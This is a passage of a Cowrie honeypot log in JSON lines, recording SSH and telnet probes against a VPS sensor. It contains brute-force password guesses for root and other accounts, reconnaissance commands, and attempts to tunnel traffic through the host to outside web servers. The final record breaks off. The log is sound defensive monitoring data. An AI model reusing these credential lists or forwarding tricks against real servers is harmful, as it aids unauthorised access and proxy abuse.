{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T21:06:19.954498Z","src_ip":"196.251.85.34","session":"263b9f6a9c61"}
{"eventid":"cowrie.login.success","username":"root","password":"@#$%^&*!","message":"login attempt [root/@#$%^&*!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:06:20.200815Z","src_ip":"196.251.85.34","session":"263b9f6a9c61"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"196.251.85.34","dst_port":80,"src_ip":"196.251.85.34","src_port":5555,"message":"direct-tcp connection request to 196.251.85.34:80 from 127.0.0.1:5555","sensor":"my-vps","timestamp":"2025-08-28T21:06:20.812726Z","session":"263b9f6a9c61"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"196.251.85.34","dst_port":80,"data":"b'gEXb1SsFHOBsGnXPETNaTKcTcfXd0ssKI1NgVfMKqIMA4klGNM'","id":0,"message":"discarded direct-tcp forward request 0 to 196.251.85.34:80 with data b'gEXb1SsFHOBsGnXPETNaTKcTcfXd0ssKI1NgVfMKqIMA4klGNM'","sensor":"my-vps","timestamp":"2025-08-28T21:06:20.843565Z","src_ip":"196.251.85.34","session":"263b9f6a9c61"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"2.0","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:20.916849Z","src_ip":"212.227.125.160","session":"767c9207a47b"}
{"eventid":"cowrie.session.closed","duration":"13.3","message":"Connection lost after 13.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:20.917932Z","src_ip":"212.227.125.160","session":"767c9207a47b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:21.545268Z","src_ip":"196.251.85.34","session":"263b9f6a9c61"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":37972,"dst_ip":"1.2.3.4","dst_port":22,"session":"12630833caa2","protocol":"ssh","message":"New connection: 196.251.85.34:37972 (1.2.3.4:22) [session: 12630833caa2]","sensor":"my-vps","timestamp":"2025-08-28T21:06:23.161040Z"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:23.884298Z","src_ip":"196.251.85.34","session":"12630833caa2"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":47530,"dst_ip":"1.2.3.4","dst_port":22,"session":"37dfaa2d2642","protocol":"ssh","message":"New connection: 196.251.85.34:47530 (1.2.3.4:22) [session: 37dfaa2d2642]","sensor":"my-vps","timestamp":"2025-08-28T21:06:25.600990Z"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:26.302083Z","src_ip":"196.251.85.34","session":"37dfaa2d2642"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":56690,"dst_ip":"1.2.3.4","dst_port":22,"session":"6622637a7222","protocol":"ssh","message":"New connection: 201.148.180.50:56690 (1.2.3.4:22) [session: 6622637a7222]","sensor":"my-vps","timestamp":"2025-08-28T21:06:27.226853Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":47532,"dst_ip":"1.2.3.4","dst_port":22,"session":"a82ec94a72f7","protocol":"ssh","message":"New connection: 196.251.85.34:47532 (1.2.3.4:22) [session: a82ec94a72f7]","sensor":"my-vps","timestamp":"2025-08-28T21:06:27.262742Z"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:28.194149Z","src_ip":"196.251.85.34","session":"a82ec94a72f7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:06:28.350968Z","src_ip":"201.148.180.50","session":"6622637a7222"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:06:28.351723Z","src_ip":"201.148.180.50","session":"6622637a7222"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":47536,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4948d5d14e6","protocol":"ssh","message":"New connection: 196.251.85.34:47536 (1.2.3.4:22) [session: a4948d5d14e6]","sensor":"my-vps","timestamp":"2025-08-28T21:06:29.105081Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 196.251.85.34:80 HTTP/1.0","message":"Remote SSH version: CONNECT 196.251.85.34:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T21:06:29.630307Z","src_ip":"196.251.85.34","session":"a4948d5d14e6"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:29.631398Z","src_ip":"196.251.85.34","session":"a4948d5d14e6"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":47538,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fbd176364a5","protocol":"ssh","message":"New connection: 196.251.85.34:47538 (1.2.3.4:22) [session: 5fbd176364a5]","sensor":"my-vps","timestamp":"2025-08-28T21:06:32.276080Z"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:33.013020Z","src_ip":"196.251.85.34","session":"5fbd176364a5"}
{"eventid":"cowrie.login.success","username":"root","password":"123mudar","message":"login attempt [root/123mudar] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:06:34.390990Z","src_ip":"201.148.180.50","session":"6622637a7222"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":27468,"dst_ip":"1.2.3.4","dst_port":22,"session":"04897e1f4ebc","protocol":"ssh","message":"New connection: 196.251.85.34:27468 (1.2.3.4:22) [session: 04897e1f4ebc]","sensor":"my-vps","timestamp":"2025-08-28T21:06:34.535559Z"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:35.196367Z","src_ip":"196.251.85.34","session":"04897e1f4ebc"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":27486,"dst_ip":"1.2.3.4","dst_port":22,"session":"b65d81b78c9c","protocol":"ssh","message":"New connection: 196.251.85.34:27486 (1.2.3.4:22) [session: b65d81b78c9c]","sensor":"my-vps","timestamp":"2025-08-28T21:06:36.656985Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:37.428319Z","src_ip":"196.251.85.34","session":"b65d81b78c9c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":27502,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dddfe096434","protocol":"ssh","message":"New connection: 196.251.85.34:27502 (1.2.3.4:22) [session: 3dddfe096434]","sensor":"my-vps","timestamp":"2025-08-28T21:06:38.163038Z"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:38.784415Z","src_ip":"196.251.85.34","session":"3dddfe096434"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:06:40.438599Z","src_ip":"201.148.180.50","session":"6622637a7222"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-28T21:06:40.439380Z","src_ip":"201.148.180.50","session":"6622637a7222"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.34","src_port":27514,"dst_ip":"1.2.3.4","dst_port":22,"session":"905d907ee648","protocol":"ssh","message":"New connection: 196.251.85.34:27514 (1.2.3.4:22) [session: 905d907ee648]","sensor":"my-vps","timestamp":"2025-08-28T21:06:40.442061Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 196.251.85.34:80 HTTP/1.0","message":"Remote SSH version: CONNECT 196.251.85.34:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T21:06:40.931585Z","src_ip":"196.251.85.34","session":"905d907ee648"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:40.932694Z","src_ip":"196.251.85.34","session":"905d907ee648"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:41.950880Z","src_ip":"201.148.180.50","session":"6622637a7222"}
{"eventid":"cowrie.session.closed","duration":"14.7","message":"Connection lost after 14.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:06:41.969410Z","src_ip":"201.148.180.50","session":"6622637a7222"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59402,"dst_ip":"1.2.3.4","dst_port":22,"session":"7991dbd734c6","protocol":"ssh","message":"New connection: 217.72.205.35:59402 (1.2.3.4:22) [session: 7991dbd734c6]","sensor":"my-vps","timestamp":"2025-08-28T21:09:08.830344Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:09:08.832159Z","src_ip":"217.72.205.35","session":"7991dbd734c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33196,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3fb9c325b17","protocol":"ssh","message":"New connection: 212.227.125.160:33196 (1.2.3.4:22) [session: d3fb9c325b17]","sensor":"my-vps","timestamp":"2025-08-28T21:09:57.635505Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:09:57.636589Z","src_ip":"212.227.125.160","session":"d3fb9c325b17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33483,"dst_ip":"1.2.3.4","dst_port":22,"session":"25fec894cd84","protocol":"ssh","message":"New connection: 212.227.125.160:33483 (1.2.3.4:22) [session: 25fec894cd84]","sensor":"my-vps","timestamp":"2025-08-28T21:09:57.750209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:09:57.750915Z","src_ip":"212.227.125.160","session":"25fec894cd84"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T21:09:57.866513Z","src_ip":"212.227.125.160","session":"25fec894cd84"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:09:58.215194Z","src_ip":"212.227.125.160","session":"25fec894cd84"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T21:09:58.331566Z","session":"25fec894cd84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56860,"dst_ip":"1.2.3.4","dst_port":23,"session":"a78e62ae151b","protocol":"telnet","message":"New connection: 212.227.235.229:56860 (1.2.3.4:23) [session: a78e62ae151b]","sensor":"my-vps","timestamp":"2025-08-28T21:11:01.296337Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T21:11:01.974296Z","src_ip":"212.227.235.229","session":"a78e62ae151b"}
{"eventid":"cowrie.session.closed","duration":3.634023427963257,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:11:04.930283Z","src_ip":"212.227.235.229","session":"a78e62ae151b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56872,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b4d656dcb85","protocol":"telnet","message":"New connection: 212.227.235.229:56872 (1.2.3.4:23) [session: 3b4d656dcb85]","sensor":"my-vps","timestamp":"2025-08-28T21:11:05.156636Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:11:05.952760Z","src_ip":"212.227.235.229","session":"3b4d656dcb85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:11:05.974349Z","src_ip":"212.227.235.229","session":"3b4d656dcb85"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T21:11:06.331768Z","src_ip":"212.227.235.229","session":"3b4d656dcb85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:11:07.549071Z","src_ip":"212.227.235.229","session":"3b4d656dcb85"}
{"eventid":"cowrie.session.closed","duration":2.3977534770965576,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:11:07.554312Z","src_ip":"212.227.235.229","session":"3b4d656dcb85"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:11:07.750478Z","src_ip":"212.227.125.160","session":"25fec894cd84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62490,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d33317f45c4","protocol":"ssh","message":"New connection: 212.227.235.229:62490 (1.2.3.4:22) [session: 3d33317f45c4]","sensor":"my-vps","timestamp":"2025-08-28T21:11:29.291646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T21:11:29.292703Z","src_ip":"212.227.235.229","session":"3d33317f45c4"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T21:11:29.421413Z","src_ip":"212.227.235.229","session":"3d33317f45c4"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia","message":"login attempt [sylvia/sylvia] failed","sensor":"my-vps","timestamp":"2025-08-28T21:11:30.020837Z","src_ip":"212.227.235.229","session":"3d33317f45c4"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia1","message":"login attempt [sylvia/sylvia1] failed","sensor":"my-vps","timestamp":"2025-08-28T21:11:31.159065Z","src_ip":"212.227.235.229","session":"3d33317f45c4"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia123","message":"login attempt [sylvia/sylvia123] failed","sensor":"my-vps","timestamp":"2025-08-28T21:11:32.290434Z","src_ip":"212.227.235.229","session":"3d33317f45c4"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia1234","message":"login attempt [sylvia/sylvia1234] failed","sensor":"my-vps","timestamp":"2025-08-28T21:11:33.421757Z","src_ip":"212.227.235.229","session":"3d33317f45c4"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia12345","message":"login attempt [sylvia/sylvia12345] failed","sensor":"my-vps","timestamp":"2025-08-28T21:11:34.552892Z","src_ip":"212.227.235.229","session":"3d33317f45c4"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:11:35.696679Z","src_ip":"212.227.235.229","session":"3d33317f45c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60205,"dst_ip":"1.2.3.4","dst_port":23,"session":"2f08faeb636e","protocol":"telnet","message":"New connection: 212.227.235.229:60205 (1.2.3.4:23) [session: 2f08faeb636e]","sensor":"my-vps","timestamp":"2025-08-28T21:11:58.897590Z"}
{"eventid":"cowrie.session.connect","src_ip":"134.209.178.174","src_port":52300,"dst_ip":"1.2.3.4","dst_port":23,"session":"8cc1bfa3bc85","protocol":"telnet","message":"New connection: 134.209.178.174:52300 (1.2.3.4:23) [session: 8cc1bfa3bc85]","sensor":"my-vps","timestamp":"2025-08-28T21:12:00.300202Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T21:12:00.407067Z","src_ip":"134.209.178.174","session":"8cc1bfa3bc85"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T21:12:01.512004Z","src_ip":"134.209.178.174","session":"8cc1bfa3bc85"}
{"eventid":"cowrie.session.closed","duration":2.336355447769165,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:12:02.636493Z","src_ip":"134.209.178.174","session":"8cc1bfa3bc85"}
{"eventid":"cowrie.session.connect","src_ip":"134.209.178.174","src_port":52304,"dst_ip":"1.2.3.4","dst_port":23,"session":"db0b2c97f2a9","protocol":"telnet","message":"New connection: 134.209.178.174:52304 (1.2.3.4:23) [session: db0b2c97f2a9]","sensor":"my-vps","timestamp":"2025-08-28T21:12:02.657017Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:12:02.789436Z","src_ip":"134.209.178.174","session":"db0b2c97f2a9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:12:02.811311Z","src_ip":"134.209.178.174","session":"db0b2c97f2a9"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T21:12:04.400192Z","src_ip":"134.209.178.174","session":"db0b2c97f2a9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:12:05.406452Z","src_ip":"134.209.178.174","session":"db0b2c97f2a9"}
{"eventid":"cowrie.session.closed","duration":2.754544973373413,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:12:05.411474Z","src_ip":"134.209.178.174","session":"db0b2c97f2a9"}
{"eventid":"cowrie.session.closed","duration":13.272049903869629,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:12:12.169571Z","src_ip":"212.227.235.229","session":"2f08faeb636e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43162,"dst_ip":"1.2.3.4","dst_port":22,"session":"1db993539619","protocol":"ssh","message":"New connection: 212.227.125.160:43162 (1.2.3.4:22) [session: 1db993539619]","sensor":"my-vps","timestamp":"2025-08-28T21:12:32.361327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:12:33.510364Z","src_ip":"212.227.125.160","session":"1db993539619"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 